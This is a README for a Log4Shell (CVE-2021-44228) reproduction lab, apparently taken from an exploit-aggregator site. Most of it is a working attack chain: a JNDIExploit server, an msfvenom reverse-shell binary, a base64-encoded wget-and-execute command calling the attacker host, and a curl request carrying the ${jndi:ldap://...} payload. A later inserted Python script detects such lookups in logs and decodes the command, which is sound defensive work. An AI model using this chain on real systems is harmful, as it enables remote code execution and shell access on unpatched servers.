## https://sploitus.com/exploit?id=8D604793-908D-5C35-A3EF-6D2688A10312
# Log4Shell Reproduction Environment

## Example description

Victim machine IP: 47.47.47.47

Attacker machine IP: 48.48.48.48

## Run the vulnerable Docker container on the victim machine

- Build the Docker image from the Dockerfile and run it:

```
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln
```

## Run the attack Docker container on the attacker machine

- Build the Docker image from the Dockerfile and run it:

```
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack
```

**Attacker machine environment preparation**

Run the following commands in three separate shells; each shell must stay open while the lab runs.

- Start the JNDI server on the attacker machine

```
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
```

- Start the HTTP server on the attacker machine

```
docker exec -it attack /bin/bash
python3 -m http.server 9999
```

- Start an nc listener on the attacker machine

```
docker exec -it attack /bin/bash
nc -lvvp 9000
```

**Carry out the attack from the attacker machine**

Run the following commands in a single shell

```
docker exec -it attack /bin/bash
```

- Prepare the reverse shell binary on the attacker machine

```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
```

- Prepare the payload on the attacker machine

```
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
```

- Send the attack payload

```
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'
```
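The request above is exactly what a defender wants to catch in access or application logs. The script below is an added detection example, not part of this repository: it scans request records for the `${jndi:<scheme>://<host>:<port>/...}` lookup pattern used in the `X-Api-Version` header, records the callback host and port, and decodes the `/Base64/` command segment so an analyst can see what the payload would have run. The JSON-lines record format, the field names and the sample records are assumptions made for this example.

```python
"""Detection example (constructed): flag Log4Shell-style JNDI lookups in
request headers and decode the Base64 command segment for triage."""
import base64
import json
import re

# ${jndi:<scheme>://<host>[:<port>]<path>} as it appears in the header above.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)
# JNDIExploit-style "/Basic/Command/Base64/<b64>" path segment.
B64_SEG_RE = re.compile(r"/Base64/(?P<b64>[A-Za-z0-9+/=]+)")


def decode_command(path):
    """Return the command embedded in a /Base64/ segment, or None if absent/invalid."""
    m = B64_SEG_RE.search(path)
    if m is None:
        return None
    try:
        raw = base64.b64decode(m.group("b64"), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-8", errors="replace").strip()


def scan_request(record):
    """record: dict with 'src' and 'headers' (assumed format). Returns a list of findings."""
    findings = []
    for name, value in record.get("headers", {}).items():
        for m in JNDI_RE.finditer(value):
            findings.append({
                "src": record.get("src"),
                "header": name,
                "scheme": m.group("scheme").lower(),
                "callback_host": m.group("host"),
                "callback_port": int(m.group("port")) if m.group("port") else None,
                "command": decode_command(m.group("path")),
            })
    return findings


def scan_log(lines):
    """Scan JSON-lines request records; lines that are not valid JSON are skipped."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        findings.extend(scan_request(record))
    return findings


# Constructed sample log: a benign request, the request from this page, and junk.
PAGE_B64 = (
    "d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1v"
    "ZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg=="
)
SAMPLE_LOG = [
    json.dumps({"src": "10.0.0.5", "path": "/",
                "headers": {"User-Agent": "curl/7.81.0", "X-Api-Version": "1.0"}}),
    json.dumps({"src": "48.48.48.48", "path": "/",
                "headers": {"User-Agent": "curl/7.81.0",
                            "X-Api-Version": "${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/" + PAGE_B64 + "}"}}),
    "not json at all",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"ALERT src={f['src']} header={f['header']} "
              f"{f['scheme']}://{f['callback_host']}:{f['callback_port']} cmd={f['command']!r}")
```

Any hit identifies the callback host to block and the application to check for an unpatched Log4j 2 release. The regex matches the plain lookup form shown on this page; production rules need to cover the other variants the attacker tooling can emit, and the decoded command should be treated as untrusted text, never executed.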

## Command generation

```
python3 command_gen.py vuln_ip attack_ip
```

## Video demonstration

[Video](https://github.com/ycdxsb/Log4Shell-CVE-2021-44228-ENV/tree/main/ScreenFlow.mp4)

## References

- https://github.com/christophetd/log4shell-vulnerable-app
- https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab